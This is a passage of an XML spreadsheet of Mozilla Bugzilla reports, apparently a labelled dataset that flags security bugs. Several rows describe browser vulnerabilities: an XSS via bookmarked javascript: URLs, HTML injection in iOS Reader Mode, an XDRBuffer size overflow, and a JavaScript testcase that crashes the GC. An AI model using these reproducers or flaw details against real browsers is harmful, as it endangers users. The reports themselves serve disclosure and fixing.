	  return result;
	}
  ```
  - You can see that the sub_2A7A480 function is called at [1] and the glGetProgramiv function of the OpenGL library is called at point [2]. After that, a buffer overflow occurs while loading and processing the OpenGL library in XUL.
## Reproduce
  - Download the attached file.
  - open poc.html on firefox.
## CREDIT Information
  - Dohyun Lee (@l33d0hyun) of SSD-Disclosure Labs &amp; DNSLab, Korea Univ.
Expected results:
No crash</t>
        </is>
      </c>
      <c r="X1920" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1921">
      <c r="A1921" t="n">
        <v>1379860</v>
      </c>
      <c r="B1921" t="inlineStr">
        <is>
          <t>2017-07-10 18:20:06 -0700</t>
        </is>
      </c>
      <c r="C1921" t="inlineStr">
        <is>
          <t>shipping origin new tab page view by default</t>
        </is>
      </c>
      <c r="D1921" t="inlineStr">
        <is>
          <t>2017-08-08 14:33:01 -0700</t>
        </is>
      </c>
      <c r="E1921" t="n">
        <v>1</v>
      </c>
      <c r="F1921" t="n">
        <v>1</v>
      </c>
      <c r="G1921" t="n">
        <v>2</v>
      </c>
      <c r="H1921" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1921" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1921" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K1921" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1921" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1921" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1921" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1921" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1921" t="inlineStr">
        <is>
          <t>[photon-onboarding]</t>
        </is>
      </c>
      <c r="Q1921" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1921" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1921" t="inlineStr">
        <is>
          <t>Firefox 56</t>
        </is>
      </c>
      <c r="T1921" t="n">
        <v>1</v>
      </c>
      <c r="U1921" t="n">
        <v>0</v>
      </c>
      <c r="V1921" t="n">
        <v>16</v>
      </c>
      <c r="W1921" t="inlineStr">
        <is>
          <t>as bug 1369287 comment 22, PM decide to use the origin new tab page view</t>
        </is>
      </c>
      <c r="X1921" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1922">
      <c r="A1922" t="n">
        <v>693786</v>
      </c>
      <c r="B1922" t="inlineStr">
        <is>
          <t>2011-10-11 13:39:10 -0700</t>
        </is>
      </c>
      <c r="C1922" t="inlineStr">
        <is>
          <t>nagios error "0 processes with regex args pulse_publisher.py"</t>
        </is>
      </c>
      <c r="D1922" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1922" t="n">
        <v>1</v>
      </c>
      <c r="F1922" t="n">
        <v>1</v>
      </c>
      <c r="G1922" t="n">
        <v>5</v>
      </c>
      <c r="H1922" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1922" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1922" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1922" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1922" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1922" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1922" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1922" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1922" t="inlineStr">
        <is>
          <t>[pulse][buildmasters]</t>
        </is>
      </c>
      <c r="Q1922" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1922" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1922" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1922" t="n">
        <v>1</v>
      </c>
      <c r="U1922" t="n">
        <v>0</v>
      </c>
      <c r="V1922" t="n">
        <v>6</v>
      </c>
      <c r="W1922" t="inlineStr">
        <is>
          <t>I've getting consistent email alerts on this error since 07oct2011. Not sure if I should reopen bug#692830 or if this is a new issue. Filing to track - please handle as you think is best.
========
-------- Original Message --------
Subject: ** PROBLEM alert - preproduction-master.build.sjc1/preproduction-master.build.sjc1 - pulse_publisher is CRITICAL **
Date: Fri,  7 Oct 2011 16:16:41 -0700 (PDT)
From: nagios@dm-nagios01.mozilla.org (nagios)
To: release@mozilla.com,zandr@mozilla.com
***** Nagios  *****
Notification Type: PROBLEM
Service: preproduction-master.build.sjc1 - pulse_publisher
Host: preproduction-master.build.sjc1
Address: 10.2.71.79
State: CRITICAL
Date/Time: 10-07-2011 16:16:41
Additional Info:
PROCS CRITICAL: 0 processes with regex args pulse_publisher.py</t>
        </is>
      </c>
      <c r="X1922" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1923">
      <c r="A1923" t="n">
        <v>371179</v>
      </c>
      <c r="B1923" t="inlineStr">
        <is>
          <t>2007-02-21 15:45:41 -0800</t>
        </is>
      </c>
      <c r="C1923" t="inlineStr">
        <is>
          <t>Don't allow bookmarking an evaluated+loaded javascript: URL</t>
        </is>
      </c>
      <c r="D1923" t="inlineStr">
        <is>
          <t>2022-10-10 14:42:05 -0700</t>
        </is>
      </c>
      <c r="E1923" t="n">
        <v>1</v>
      </c>
      <c r="F1923" t="n">
        <v>1</v>
      </c>
      <c r="G1923" t="n">
        <v>2</v>
      </c>
      <c r="H1923" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1923" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1923" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1923" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1923" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1923" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1923" t="inlineStr">
        <is>
          <t>NEW</t>
        </is>
      </c>
      <c r="O1923" t="inlineStr"/>
      <c r="P1923" t="inlineStr">
        <is>
          <t>[sg:want][xss with nearly normal user interaction and no upside]</t>
        </is>
      </c>
      <c r="Q1923" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1923" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1923" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1923" t="n">
        <v>1</v>
      </c>
      <c r="U1923" t="n">
        <v>6</v>
      </c>
      <c r="V1923" t="n">
        <v>43</v>
      </c>
      <c r="W1923" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
Build Identifier: 
It should be not possible to bookmark data: and other inline / special URL schemes, or, if this functionality is needed, Javascript execution context should be properly initialized. Otherwise, such a bookmark, when invoked, will be allowed to execute Javascript code in the context of a currently viewed resource (Google start page = stealing GMail authentication cookies, for example).
See this demonstration:
http://lcamtuf.coredump.cx/ffbook/
Reproducible: Always</t>
        </is>
      </c>
      <c r="X1923" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1924">
      <c r="A1924" t="n">
        <v>1861420</v>
      </c>
      <c r="B1924" t="inlineStr">
        <is>
          <t>2023-10-26 07:10:16 -0700</t>
        </is>
      </c>
      <c r="C1924" t="inlineStr">
        <is>
          <t>HTML injection in %READER-BYLINE% of ReaderMode of Firefox for iOS</t>
        </is>
      </c>
      <c r="D1924" t="inlineStr">
        <is>
          <t>2024-09-16 00:04:46 -0700</t>
        </is>
      </c>
      <c r="E1924" t="n">
        <v>1</v>
      </c>
      <c r="F1924" t="n">
        <v>1</v>
      </c>
      <c r="G1924" t="n">
        <v>2</v>
      </c>
      <c r="H1924" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1924" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J1924" t="inlineStr">
        <is>
          <t>Reader View</t>
        </is>
      </c>
      <c r="K1924" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1924" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1924" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1924" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1924" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1924" t="inlineStr">
        <is>
          <t>[stepping stone to critical][reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q1924" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1924" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1924" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1924" t="n">
        <v>1</v>
      </c>
      <c r="U1924" t="n">
        <v>0</v>
      </c>
      <c r="V1924" t="n">
        <v>8</v>
      </c>
      <c r="W1924" t="inlineStr">
        <is>
          <t>Created attachment 9360426
demonstration-on-bitbucket.mov
The following commit replaced %READER-CREDITS% to %READER-BYLINE% in the ReaderMode template of Firefox for iOS.
https://github.com/mozilla-mobile/firefox-ios/commit/3c6ea106b139ae581b6bb6da86f31a1fe53fcb49#diff-953c74716db0300bf5fd5751de34b1ab0674deb75cacdd8ecae8ae7ba700da98R18
Previously, %READER-CREDITS% was prone to HTML injection attack but it was fixed on Bug 1653822 by escaping HTML tags in author name as follows.
https://github.com/mozilla-mobile/firefox-ios/blob/main/Client/Frontend/UserContent/UserScripts/MainFrame/AtDocumentStart/ReaderMode.js#L81
But the fix is not applied to %READER-BYLINE%, so HTML injection in ReaderMode is possible again through &lt;meta [author]&gt; tag in the original page.
The following URL is a demonstration of this bug on Atlassian BitBucket.
By abusing privilege escalation bug reported by Bug 1861405, XSS on internal://local through the bug can be achieved.
https://bitbucket.org/muneaki_nishimura/author/issues/1/test</t>
        </is>
      </c>
      <c r="X1924" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1925">
      <c r="A1925" t="n">
        <v>1178033</v>
      </c>
      <c r="B1925" t="inlineStr">
        <is>
          <t>2015-06-27 12:52:08 -0700</t>
        </is>
      </c>
      <c r="C1925" t="inlineStr">
        <is>
          <t>Overflow in XDRBuffer::grow can cause memory-safety bug</t>
        </is>
      </c>
      <c r="D1925" t="inlineStr">
        <is>
          <t>2024-05-30 09:02:42 -0700</t>
        </is>
      </c>
      <c r="E1925" t="n">
        <v>1</v>
      </c>
      <c r="F1925" t="n">
        <v>1</v>
      </c>
      <c r="G1925" t="n">
        <v>3</v>
      </c>
      <c r="H1925" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1925" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1925" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1925" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1925" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1925" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1925" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1925" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1925" t="inlineStr">
        <is>
          <t>[adv-main43+][post-critsmash-triage][adv-main43+] seems untriggerable from content</t>
        </is>
      </c>
      <c r="Q1925" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1925" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1925" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T1925" t="n">
        <v>1</v>
      </c>
      <c r="U1925" t="n">
        <v>0</v>
      </c>
      <c r="V1925" t="n">
        <v>12</v>
      </c>
      <c r="W1925" t="inlineStr">
        <is>
          <t>XDRBuffer::grow (js/src/vm/Xdr.cpp, current trunk) can cause an overflow when computing the new buffer size. If this happens, grow allocates a buffer that is much too small, and its callers write far beyond its end:
27: bool
28: XDRBuffer::grow(size_t n)
29: {
30:     MOZ_ASSERT(n &gt; size_t(limit - cursor));
31: 
32:     const size_t MIN_CAPACITY = 8192;
33:     size_t offset = cursor - base;
34:     size_t newCapacity = mozilla::RoundUpPow2(offset + n);
35:     if (newCapacity &lt; MIN_CAPACITY)
36:         newCapacity = MIN_CAPACITY;
37:     if (isUint32Overflow(newCapacity)) {
38:         js::gc::AutoSuppressGC suppressGC(cx());
39:         JS_ReportErrorNumber(cx(), GetErrorMessage, nullptr, JSMSG_TOO_BIG_TO_ENCODE);
40:         return false;
41:     }
42: 
43:     void* data = js_realloc(base, newCapacity);
44:     if (!data) {
45:         ReportOutOfMemory(cx());
46:         return false;
47:     }
48:     base = static_cast&lt;uint8_t*&gt;(data);
49:     cursor = base + offset;
50:     limit = base + newCapacity;
51:     return true;
52: }
The problem occurs on 32-bit platforms only. If offset + n on line 34 exceeds 0x80000001, RoundUpPow2 returns 1 (1 &lt;&lt; 32) under Windows 32-bit (note that this is actually undefined per C++11 s.5.8(1)). Lines 35-6 then calculate newCapacity==MIN_CAPACITY (8192). The test on line 37 is useless because newCapacity has already overflowed. Line 43 then allocates the tiny buffer, line 49 computes a cursor well outside the buffer's bounds, and the function returns true. Its caller then uses cursor to write into the buffer.
XDRBuffer appears to be used to serialize compiled javascripts. Is it possible for a web page to contain one or more gigantic javascripts that would invoke this bug?</t>
        </is>
      </c>
      <c r="X1925" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1926">
      <c r="A1926" t="n">
        <v>1201989</v>
      </c>
      <c r="B1926" t="inlineStr">
        <is>
          <t>2015-09-04 12:24:33 -0700</t>
        </is>
      </c>
      <c r="C1926" t="inlineStr">
        <is>
          <t>Reduce space consumption in the Sheriff and Filter panels</t>
        </is>
      </c>
      <c r="D1926" t="inlineStr">
        <is>
          <t>2015-09-24 13:37:45 -0700</t>
        </is>
      </c>
      <c r="E1926" t="n">
        <v>1</v>
      </c>
      <c r="F1926" t="n">
        <v>1</v>
      </c>
      <c r="G1926" t="n">
        <v>7</v>
      </c>
      <c r="H1926" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1926" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1926" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K1926" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1926" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1926" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1926" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1926" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1926" t="inlineStr"/>
      <c r="Q1926" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R1926" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S1926" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1926" t="n">
        <v>1</v>
      </c>
      <c r="U1926" t="n">
        <v>0</v>
      </c>
      <c r="V1926" t="n">
        <v>7</v>
      </c>
      <c r="W1926" t="inlineStr">
        <is>
          <t>The Sheriff and Filter panels take up a lot of space and in the case of Job exclusions we don't fit the available Sheriff panel dimensions.
So if folks think it's reasonable, let's reduce the body font size in both panels from 14px to 12px.
There's other economies we can achieve, but we can visit those after.</t>
        </is>
      </c>
      <c r="X1926" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1927">
      <c r="A1927" t="n">
        <v>68939</v>
      </c>
      <c r="B1927" t="inlineStr">
        <is>
          <t>2001-02-15 10:21:44 -0800</t>
        </is>
      </c>
      <c r="C1927" t="inlineStr">
        <is>
          <t>Browser crashes after entering stock quotes in Stocks panel's textfield and hitting ENTER</t>
        </is>
      </c>
      <c r="D1927" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E1927" t="n">
        <v>1</v>
      </c>
      <c r="F1927" t="n">
        <v>1</v>
      </c>
      <c r="G1927" t="n">
        <v>2</v>
      </c>
      <c r="H1927" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1927" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J1927" t="inlineStr">
        <is>
          <t>Sidebar</t>
        </is>
      </c>
      <c r="K1927" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1927" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1927" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1927" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1927" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1927" t="inlineStr"/>
      <c r="Q1927" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1927" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1927" t="inlineStr">
        <is>
          <t>mozilla0.9.1</t>
        </is>
      </c>
      <c r="T1927" t="n">
        <v>1</v>
      </c>
      <c r="U1927" t="n">
        <v>0</v>
      </c>
      <c r="V1927" t="n">
        <v>7</v>
      </c>
      <c r="W1927" t="inlineStr">
        <is>
          <t>Seen on all platforms, trunk builds
Steps:
Launch sidebar stocks panel
Enter a stock symbol in the textfield and hit ENTER or press 'Quote' button
Enter another symbol and hit ENTER ot press 'quote' button
On windows, this definitely crashes after the second attempt. On mac and linux, 
it crashes too but not with a definite number of attemps.
Stack trace coming....</t>
        </is>
      </c>
      <c r="X1927" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1928">
      <c r="A1928" t="n">
        <v>1347804</v>
      </c>
      <c r="B1928" t="inlineStr">
        <is>
          <t>2017-03-15 21:43:14 -0700</t>
        </is>
      </c>
      <c r="C1928" t="inlineStr">
        <is>
          <t>Use Intl.collation instead of nsICollation</t>
        </is>
      </c>
      <c r="D1928" t="inlineStr">
        <is>
          <t>2020-05-12 10:19:01 -0700</t>
        </is>
      </c>
      <c r="E1928" t="n">
        <v>1</v>
      </c>
      <c r="F1928" t="n">
        <v>1</v>
      </c>
      <c r="G1928" t="n">
        <v>2</v>
      </c>
      <c r="H1928" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1928" t="inlineStr">
        <is>
          <t>Calendar</t>
        </is>
      </c>
      <c r="J1928" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1928" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1928" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1928" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1928" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1928" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1928" t="inlineStr"/>
      <c r="Q1928" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1928" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1928" t="inlineStr">
        <is>
          <t>Thunderbird 78.0</t>
        </is>
      </c>
      <c r="T1928" t="n">
        <v>1</v>
      </c>
      <c r="U1928" t="n">
        <v>0</v>
      </c>
      <c r="V1928" t="n">
        <v>7</v>
      </c>
      <c r="W1928" t="inlineStr">
        <is>
          <t>Although I don't decide that nsICollation changes to non-scriptable, Canlendar can use Intl.collation instead.
Intl.collation is standardized API by ECMA-402, calendar (calendar/base/modules/calUtils.jsm etc) should use it instead of nsICollation.</t>
        </is>
      </c>
      <c r="X1928" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1929">
      <c r="A1929" t="n">
        <v>421308</v>
      </c>
      <c r="B1929" t="inlineStr">
        <is>
          <t>2008-03-06 09:01:31 -0800</t>
        </is>
      </c>
      <c r="C1929" t="inlineStr">
        <is>
          <t>Talos fell off of 1.8 branch</t>
        </is>
      </c>
      <c r="D1929" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1929" t="n">
        <v>1</v>
      </c>
      <c r="F1929" t="n">
        <v>1</v>
      </c>
      <c r="G1929" t="n">
        <v>5</v>
      </c>
      <c r="H1929" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1929" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1929" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1929" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1929" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1929" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1929" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1929" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1929" t="inlineStr"/>
      <c r="Q1929" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1929" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1929" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1929" t="n">
        <v>1</v>
      </c>
      <c r="U1929" t="n">
        <v>0</v>
      </c>
      <c r="V1929" t="n">
        <v>4</v>
      </c>
      <c r="W1929" t="inlineStr">
        <is>
          <t>The old perf machines are still going, but Talos stopped reporting on 1.8 branch some time yesterday.</t>
        </is>
      </c>
      <c r="X1929" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1930">
      <c r="A1930" t="n">
        <v>1138199</v>
      </c>
      <c r="B1930" t="inlineStr">
        <is>
          <t>2015-03-01 11:49:33 -0800</t>
        </is>
      </c>
      <c r="C1930" t="inlineStr">
        <is>
          <t>Crash [@ js::ConstraintTypeSet::sweep] or Assertion failure: addr % CellSize == 0, at gc/Heap.h:1229 with runOffThreadScript</t>
        </is>
      </c>
      <c r="D1930" t="inlineStr">
        <is>
          <t>2016-07-02 10:34:13 -0700</t>
        </is>
      </c>
      <c r="E1930" t="n">
        <v>1</v>
      </c>
      <c r="F1930" t="n">
        <v>1</v>
      </c>
      <c r="G1930" t="n">
        <v>3</v>
      </c>
      <c r="H1930" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1930" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1930" t="inlineStr">
        <is>
          <t>JavaScript: GC</t>
        </is>
      </c>
      <c r="K1930" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1930" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1930" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1930" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1930" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1930" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main37+][adv-esr31.6+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1930" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1930" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1930" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T1930" t="n">
        <v>1</v>
      </c>
      <c r="U1930" t="n">
        <v>0</v>
      </c>
      <c r="V1930" t="n">
        <v>17</v>
      </c>
      <c r="W1930" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision eea6188b9b05 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --enable-debug, run with --fuzzing-safe --thread-count=2):
var lfGlobal = newGlobal();
var src = "var obj = {";
for (var i = 0; i &lt; 140; ++i) {
	src += "prop" + i + ": 2,";
}
src += "}; {";
lfGlobal.offThreadCompileScript(src);
lfGlobal.runOffThreadScript();
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
js::ConstraintTypeSet::sweep (this=0x1b29dd8, zone=0x1b0e280, oom=...) at js/src/vm/TypeInference.cpp:3785
3785	            ObjectKey *key = oldArray[i];
#0  js::ConstraintTypeSet::sweep (this=0x1b29dd8, zone=0x1b0e280, oom=...) at js/src/vm/TypeInference.cpp:3785
#1  0x00000000006ea90b in js::ObjectGroup::maybeSweep (this=0x7ffff568e5e0, oom=oom@entry=0x7fffffffd290) at js/src/vm/TypeInference.cpp:3944
#2  0x0000000000a9a595 in SweepThing (group=&lt;optimized out&gt;, oom=0x7fffffffd290) at js/src/jsgc.cpp:5240
#3  SweepArenaList&lt;js::ObjectGroup, js::AutoClearTypeInferenceStateOnOOM*&gt; (sliceBudget=..., arenasToSweep=0x1b0e6e0) at js/src/jsgc.cpp:5249
#4  js::gc::GCRuntime::sweepPhase (this=this@entry=0x1a076c8, sliceBudget=...) at js/src/jsgc.cpp:5292
#5  0x0000000000aa572b in js::gc::GCRuntime::incrementalCollectSlice (this=this@entry=0x1a076c8, budget=..., reason=reason@entry=JS::gcreason::DESTROY_CONTEXT) at js/src/jsgc.cpp:5941
#6  0x0000000000aa6456 in js::gc::GCRuntime::gcCycle (this=this@entry=0x1a076c8, incremental=incremental@entry=false, budget=..., reason=reason@entry=JS::gcreason::DESTROY_CONTEXT) at js/src/jsgc.cpp:6116
#7  0x0000000000aa678d in js::gc::GCRuntime::collect (this=this@entry=0x1a076c8, incremental=incremental@entry=false, budget=..., reason=reason@entry=JS::gcreason::DESTROY_CONTEXT) at js/src/jsgc.cpp:6228
#8  0x0000000000aa7a2a in js::gc::GCRuntime::gc (this=this@entry=0x1a076c8, gckind=gckind@entry=GC_NORMAL, reason=reason@entry=JS::gcreason::DESTROY_CONTEXT) at js/src/jsgc.cpp:6289
#9  0x0000000000a26517 in js::DestroyContext (cx=0x1a29b50, mode=js::DCM_FORCE_GC) at js/src/jscntxt.cpp:185
#10 0x0000000000a26814 in JS_DestroyContext (cx=&lt;optimized out&gt;) at js/src/jsapi.cpp:576
#11 0x0000000000425efd in DestroyContext (withGC=true, cx=0x1a29b50) at js/src/shell/js.cpp:5649
#12 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:6406
rax	0x1b0e7b8	28370872
rbx	0x1b29dd8	28483032
rcx	0x6	6
rdx	0x63614073	1667317875
rsi	0x1	1
rdi	0x1b	27
rbp	0x7fffffffd190	140737488343440
rsp	0x7fffffffd120	140737488343328
r8	0x8	8
r9	0x0	0
r10	0x1b29d50	28482896
r11	0x1b29d30	28482864
r12	0x200	512
r13	0x1b0e280	28369536
r14	0x0	0
r15	0x7ffff000ba10	140737219967504
rip	0x71b6df &lt;js::ConstraintTypeSet::sweep(JS::Zone*, js::AutoClearTypeInferenceStateOnOOM&amp;)+223&gt;
=&gt; 0x71b6df &lt;js::ConstraintTypeSet::sweep(JS::Zone*, js::AutoClearTypeInferenceStateOnOOM&amp;)+223&gt;:	mov    (%r14),%r15
   0x71b6e2 &lt;js::ConstraintTypeSet::sweep(JS::Zone*, js::AutoClearTypeInferenceStateOnOOM&amp;)+226&gt;:	test   %r15,%r15
Marking s-s, since this is a GC crash. The signatures vary a little.</t>
        </is>
      </c>
      <c r="X1930" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1931">
      <c r="A1931" t="n">
        <v>714590</v>
      </c>
      <c r="B1931" t="inlineStr">
        <is>
          <t>2012-01-02 01:05:49 -0800</t>
        </is>
      </c>
      <c r="C1931" t="inlineStr">
        <is>
          <t>"ASSERTION: no self" with treewalker filter, modified __proto__</t>
        </is>
      </c>
      <c r="D1931" t="inlineStr">
        <is>
          <t>2012-05-21 00:45:34 -0700</t>
        </is>
      </c>
      <c r="E1931" t="n">
        <v>1</v>
      </c>
      <c r="F1931" t="n">
        <v>1</v>
      </c>
      <c r="G1931" t="n">
        <v>3</v>
      </c>
      <c r="H1931" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1931" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1931" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K1931" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1931" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1931" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1931" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1931" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
